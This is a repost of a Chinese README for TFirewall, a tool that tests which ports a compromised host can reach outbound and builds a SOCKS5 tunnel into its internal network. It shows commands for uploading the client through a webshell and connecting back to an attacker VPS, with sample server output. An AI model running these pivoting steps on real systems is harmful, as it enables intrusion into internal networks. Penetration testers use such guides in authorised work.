防火墙出网探测工具

admin 2022年1月28日10:46:26安全工具评论75 views2257字阅读7分31秒阅读模式

作者:FunnyWolf,转载于github

TFirewall是测试已控主机哪些端口可以出网及建立内网socks5代理的工具.工具主体使用golang开发,工具包含客户端及服务端,适用于windows,linux,x64,x86.

使用方法

出网检测

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)

  • 直接运行.tfs_linux_amd64 check启动监听,工具会自动监听常用的TOP10端口,或通过 .tfs_linux_amd64 check 20-23,53,80自定义监听端口

  • 服务端打印如下信息表示监听成功

[email protected]:~# ./tfs_linux_amd64 check 20-23,53,80
Check Server listening: [20 21 22 23 53 80]
  • 通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器

  • 运行tfc_windows_386.exe check 10.10.10.10测试TOP10端口哪些可以出网

服务端对应命令.tfs_linux_amd64 check

  • 运行tfc_windows_386.exe check 10.10.10.10 20-23,53,80探测指定端口

服务端对应命令.tfs_linux_amd64 check 20-23,53,80

  • 观察服务端输出即可查看客户端可以连接服务端哪些端口,使用什么协议

[email protected]:~# ./tfs_linux_amd64 check 23,80-82
Check Server listening: [23 80 81]
RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918
RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641
RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747
RecvUDP On [::]:23 From 175.167.138.137:28822
RecvUDP On [::]:80 From 175.167.138.137:26831
RecvUDP On [::]:81 From 175.167.138.137:26832

内网socks5代理

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)

  • 通过 .tfs_linux_amd64 socks5 80 1080在80端口启动控制监听,1080启动内网socks5端口

  • 服务端打印如下信息表示监听成功

[email protected]:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening: 80
Socks5 Listening: 1080
  • 通过WEBShell管理工具将``tfc_windows_386.exe```上传到已控服务器

  • 运行tfc_windows_386.exe socks5 10.10.10.10 80连接服务端

  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)

[email protected]:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening: 80
Socks5 Listening: 1080
Socks5 new socket from : 11.11.11.11:55943
Control new socket from : 11.11.11.11:55789

内网socks5代理(TLS加密)

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)

  • 将server.pem(tls公钥),server.key(tls私钥)上传到server_linux_x64相同目录

  • 通过 .tfs_linux_amd64 socks5 80 1080 tls在80端口启动控制监听,1080启动内网socks5端口

  • 服务端打印如下信息表示监听成功

[email protected]:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening: 80
Socks5 Listening: 1080
  • 通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器

  • 运行tfc_windows_386.exe socks5 10.10.10.10 80 tls连接服务端

  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)

[email protected]:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening: 80
Socks5 Listening: 1080
Socks5 new socket from : 11.11.11.11:55943
Control new socket from : 11.11.11.11:55789

已测试

server

  • ubuntu 18

client

  • Windows 10

  • ubuntu 16

  • kali


获取方式

公众号后台回复关键词:内网

往期推荐

工具|针对 AWVS扫描器开发的批量扫描脚本

干货|应急响应常用工具

干货|Java内存马注入工具

实战|记一次hw中的上线骚姿势

强荐 | 渗透测试报告自动生成工具

干货|通过 RPC 防火墙停止横向移动

原文始发于微信公众号(HACK之道):防火墙出网探测工具

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月28日10:46:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  防火墙出网探测工具 http://cn-sec.com/archives/758072.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: